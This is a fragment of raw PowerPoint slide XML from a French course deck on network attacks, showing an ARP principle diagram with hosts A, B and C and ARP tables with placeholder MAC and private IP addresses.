            <a:ext cx="2460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83" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9420179" y="6091871"/>
            <a:ext cx="1134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err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>aaaa:aaaa:aaaa</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10936242" y="6091871"/>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70C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="271930"/>
            <a:ext cx="27876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Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="581493"/>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Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7749934" y="581493"/>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Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="891055"/>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Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7749934" y="891055"/>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Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="1200618"/>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11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7749934" y="1200618"/>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Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7749934" y="575143"/>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3" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="581493"/>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4" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="891055"/>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5" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="1200618"/>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6" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="265580"/>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7" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9021521" y="265580"/>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8" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="271930"/>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9" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="1510180"/>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0" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7172084" y="319555"/>
            <a:ext cx="9108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ARP TABLE C</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101" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6325946" y="624355"/>
            <a:ext cx="474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MAC</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102" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842009" y="624355"/>
            <a:ext cx="2460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103" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6325946" y="933918"/>
            <a:ext cx="1134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err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>aaaa:aaaa:aaaa</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842009" y="933918"/>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70C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282165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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>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1"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>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30"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>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83" grpId="0"/>
      <p:bldP spid="84" grpId="0"/>
      <p:bldP spid="103" grpId="0"/>
      <p:bldP spid="10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Attaques réseaux</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45</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 5" descr="C:\Users\Abdou\AppData\Local\Microsoft\Windows\INetCache\Content.Word\switch-por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3764" y="3709592"/>
            <a:ext cx="884431" cy="334214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Groupe 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1141243" y="3491023"/>
            <a:ext cx="773743" cy="773743"/>
            <a:chOff x="17736" y="536836"/>
            <a:chExt cx="457350" cy="457363"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Image 13"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="17736" y="536836"/>
              <a:ext cx="457350" cy="457363"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Zone de texte 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="180000" y="600317"/>
              <a:ext cx="229870" cy="2286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900" dirty="0">
                  <a:effectLst/>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Groupe 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9948186" y="3492025"/>
            <a:ext cx="773743" cy="772668"/>
            <a:chOff x="5021631" y="637128"/>
            <a:chExt cx="457200" cy="457200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Image 11"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5021631" y="637128"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Zone de texte 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5203339" y="689954"/>
              <a:ext cx="229870" cy="22796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900">
                  <a:effectLst/>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Groupe 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5270620" y="1988909"/>
            <a:ext cx="792011" cy="811355"/>
            <a:chOff x="2061351" y="238056"/>
            <a:chExt cx="479671" cy="479714"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Image 9" descr="C:\Users\Abdou\Desktop\icons\pc-hack.png"/>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2061351" y="238056"/>
              <a:ext cx="479671" cy="479714"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Zone de texte 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2225317" y="298673"/>
              <a:ext cx="229870" cy="2286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1200" dirty="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>C</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="18" name="Tableau 17"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="9301933" y="4408654"/>
          <a:ext cx="2798894" cy="928488"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="995673"/>
                <a:gridCol w="1803221"/>
              </a:tblGrid>
              <a:tr h="309496">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Hote</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> B</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>MAC</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>bbbb:bbbb:bbbb</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>IP</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>192.168.1.2</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="19" name="Tableau 18"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6232733" y="1619159"/>
          <a:ext cx="2798894" cy="944546"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="995673"/>
                <a:gridCol w="1803221"/>
              </a:tblGrid>
              <a:tr h="325554">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Hote</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> C</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" smtClean="0"/>
                        <a:t>MAC</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>cccc:cccc:cccc</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" smtClean="0"/>
                        <a:t>IP</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>192.168.1.3</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Connecteur droit 20"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="0"/>
            <a:endCxn id="10" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5665980" y="2800264"/>
            <a:ext cx="646" cy="909328"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Connecteur droit 21"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="1"/>
            <a:endCxn id="6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6108195" y="3876699"/>
            <a:ext cx="3839991" cy="1660"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Connecteur droit 24"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="3"/>
            <a:endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1914986" y="3876699"/>
            <a:ext cx="3308778" cy="1196"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="118291" y="805753"/>
            <a:ext cx="5239511" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pincipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gratuitous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="119063" y="5494338"/>
            <a:ext cx="28067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5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="125413" y="5500688"/>
            <a:ext cx="27876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Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="125413" y="5810251"/>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Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1641476" y="5810251"/>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Rectangle 8"/>
